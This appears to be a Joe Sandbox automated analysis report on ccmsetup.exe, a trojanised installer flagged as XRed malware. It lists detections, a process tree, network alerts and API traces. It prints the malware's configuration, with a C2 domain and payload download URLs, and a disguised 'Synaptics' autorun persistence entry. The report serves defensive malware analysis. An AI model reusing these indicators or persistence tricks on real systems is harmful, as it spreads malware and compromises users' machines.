Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ccmsetup.exe

Overview

General Information

Sample name:ccmsetup.exe
Analysis ID:1569604
MD5:823444545911fd17e953437b7c712f2f
SHA1:6d1c0b1c3caade86c13196a0763538d0ee29322e
SHA256:845b6f57d33b26dd409ae897707e4a5141991df780983593965983d95c06c67d
Tags:exeZorexuser-malrpt
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Registers a new ROOT certificate
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ccmsetup.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\ccmsetup.exe" MD5: 823444545911FD17E953437B7C712F2F)
    • ._cache_ccmsetup.exe (PID: 3128 cmdline: "C:\Users\user\Desktop\._cache_ccmsetup.exe" MD5: 169E238A8E29445C319F934362361D28)
    • Synaptics.exe (PID: 2180 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 020E869138373254D25D50294CEB45AF)
      • WerFault.exe (PID: 8660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 8796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 9168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 1288 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 7292 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 020E869138373254D25D50294CEB45AF)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ccmsetup.exeJoeSecurity_XRedYara detected XRedJoe Security
    ccmsetup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Synaptics\RCXD7AF.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCXD7AF.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\BJZFPPWAPT\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\BJZFPPWAPT\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      Process Memory Space: ccmsetup.exe PID: 4512JoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Synaptics.exe PID: 2180JoeSecurity_XRedYara detected XRedJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.ccmsetup.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.ccmsetup.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Excel Network Connections
                              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.63, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1288, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49965
                              Sigma detected: Suspicious Office Outbound Connections
                              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49965, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1288, Protocol: tcp, SourceIp: 13.107.246.63, SourceIsIpv6: false, SourcePort: 443
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ccmsetup.exe, ProcessId: 4512, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Local\Temp\aOkCiDht.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-05T22:51:13.379912+010020283713Unknown Traffic192.168.2.54996513.107.246.63443TCP
                              2024-12-05T22:51:28.669036+010020283713Unknown Traffic192.168.2.54999613.107.246.63443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-05T22:50:10.040926+010020448871A Network Trojan was detected192.168.2.549707172.217.19.238443TCP
                              2024-12-05T22:50:10.058361+010020448871A Network Trojan was detected192.168.2.549708172.217.19.238443TCP
                              2024-12-05T22:50:13.916914+010020448871A Network Trojan was detected192.168.2.549721172.217.19.238443TCP
                              2024-12-05T22:50:13.917017+010020448871A Network Trojan was detected192.168.2.549720172.217.19.238443TCP
                              2024-12-05T22:50:16.524228+010020448871A Network Trojan was detected192.168.2.549728172.217.19.238443TCP
                              2024-12-05T22:50:16.539757+010020448871A Network Trojan was detected192.168.2.549729172.217.19.238443TCP
                              2024-12-05T22:50:20.512345+010020448871A Network Trojan was detected192.168.2.549747172.217.19.238443TCP
                              2024-12-05T22:50:20.514577+010020448871A Network Trojan was detected192.168.2.549746172.217.19.238443TCP
                              2024-12-05T22:50:23.147931+010020448871A Network Trojan was detected192.168.2.549756172.217.19.238443TCP
                              2024-12-05T22:50:23.193532+010020448871A Network Trojan was detected192.168.2.549757172.217.19.238443TCP
                              2024-12-05T22:50:26.263261+010020448871A Network Trojan was detected192.168.2.549771172.217.19.238443TCP
                              2024-12-05T22:50:26.453865+010020448871A Network Trojan was detected192.168.2.549772172.217.19.238443TCP
                              2024-12-05T22:50:30.249703+010020448871A Network Trojan was detected192.168.2.549794172.217.19.238443TCP
                              2024-12-05T22:50:30.266871+010020448871A Network Trojan was detected192.168.2.549793172.217.19.238443TCP
                              2024-12-05T22:50:32.858878+010020448871A Network Trojan was detected192.168.2.549804172.217.19.238443TCP
                              2024-12-05T22:50:33.049361+010020448871A Network Trojan was detected192.168.2.549802172.217.19.238443TCP
                              2024-12-05T22:50:35.943042+010020448871A Network Trojan was detected192.168.2.549825172.217.19.238443TCP
                              2024-12-05T22:50:36.148062+010020448871A Network Trojan was detected192.168.2.549824172.217.19.238443TCP
                              2024-12-05T22:50:39.949573+010020448871A Network Trojan was detected192.168.2.549844172.217.19.238443TCP
                              2024-12-05T22:50:39.964544+010020448871A Network Trojan was detected192.168.2.549845172.217.19.238443TCP
                              2024-12-05T22:50:43.954881+010020448871A Network Trojan was detected192.168.2.549864172.217.19.238443TCP
                              2024-12-05T22:50:43.958340+010020448871A Network Trojan was detected192.168.2.549863172.217.19.238443TCP
                              2024-12-05T22:50:47.969861+010020448871A Network Trojan was detected192.168.2.549882172.217.19.238443TCP
                              2024-12-05T22:50:47.979997+010020448871A Network Trojan was detected192.168.2.549883172.217.19.238443TCP
                              2024-12-05T22:50:50.565071+010020448871A Network Trojan was detected192.168.2.549892172.217.19.238443TCP
                              2024-12-05T22:50:50.766342+010020448871A Network Trojan was detected192.168.2.549894172.217.19.238443TCP
                              2024-12-05T22:50:53.689614+010020448871A Network Trojan was detected192.168.2.549910172.217.19.238443TCP
                              2024-12-05T22:50:53.706762+010020448871A Network Trojan was detected192.168.2.549911172.217.19.238443TCP
                              2024-12-05T22:51:18.717113+010020448871A Network Trojan was detected192.168.2.549920172.217.19.238443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-05T22:50:09.931417+010028326171Malware Command and Control Activity Detected192.168.2.54971269.42.215.25280TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: ccmsetup.exeAvira: detected
                              Source: ccmsetup.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCXD7AF.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCXD7AF.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: ccmsetup.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCXD7AF.tmpReversingLabs: Detection: 92%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1ReversingLabs: Detection: 92%
                              Multi AV Scanner detection for submitted file
                              Source: ccmsetup.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 82.7% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCXD7AF.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1Joe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: ccmsetup.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0061A5A8 __EH_prolog3_catch,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptReleaseContext,2_2_0061A5A8
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00628AA0 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,CertEnumCertificatesInStore,_memcmp,CryptDecodeObjectEx,CompareFileTime,CertFreeCertificateContext,CertDuplicateCertificateContext,GetLastError,GetCurrentThreadId,LocalFree,LocalFree,CertFreeCertificateContext,CertFreeCertificateContext,2_2_00628AA0
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0061CB62 __EH_prolog3_catch,GetCurrentThreadId,CertFindExtension,GetCurrentThreadId,CryptDecodeObjectEx,GetLastError,GetCurrentThreadId,GetCurrentThreadId,LocalFree,2_2_0061CB62
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00626EEF __EH_prolog3_catch,GetCurrentThreadId,CryptAcquireCertificatePrivateKey,GetLastError,GetCurrentThreadId,2_2_00626EEF
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0062706A __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,_memmove,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,CryptDecodeObject,CryptDecodeObject,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CryptDecodeObject,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,_memmove,GetCurrentThreadId,_memmove,GetCurrentThreadId,CertStrToNameW,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertStrToNameW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,CertFindCertificateInStore,CompareFileTime,CertFreeCertificateContext,CertDuplicateCertificateContext,GetLastError,GetCurrentThreadId,CoTaskMemFree,CertFreeCertificateContext,CertFreeCertificateContext,2_2_0062706A
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0062567E __EH_prolog3_catch,GetCurrentThreadId,CryptVerifyCertificateSignatureEx,GetLastError,GetCurrentThreadId,2_2_0062567E
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0065788B __EH_prolog3_catch,CryptProtectData,GetLastError,CryptUnprotectData,2_2_0065788B
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_006339EA __EH_prolog3_catch,GetCurrentThreadId,CryptReleaseContext,GetLastError,GetCurrentThreadId,GetCurrentThreadId,2_2_006339EA
                              Source: ccmsetup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeFile created: C:\Windows\ccmsetup\Logs\ccmsetup.logJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49708 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49707 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49793 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49893 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49895 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49920 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.5:49923 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.5:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49965 version: TLS 1.2
                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: X:\bt\1024777\repo\out\retail-x86\ccmsetup\ccmsetup.pdb} source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.dr
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: ccmsetup.exe, 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: ccmsetup.exeBinary or memory string: [autorun]
                              Source: ccmsetup.exeBinary or memory string: [autorun]
                              Source: ccmsetup.exeBinary or memory string: autorun.inf
                              Source: RCXD7AF.tmp.0.drBinary or memory string: [autorun]
                              Source: RCXD7AF.tmp.0.drBinary or memory string: [autorun]
                              Source: RCXD7AF.tmp.0.drBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0057E422 __EH_prolog3_catch_GS,FindFirstFileW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,2_2_0057E422
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005F2842 __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,DeleteFileW,GetFileInformationByHandle,GetCurrentThreadId,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,CopyFileW,GetLastError,GetCurrentThreadId,GetLastError,FindClose,2_2_005F2842
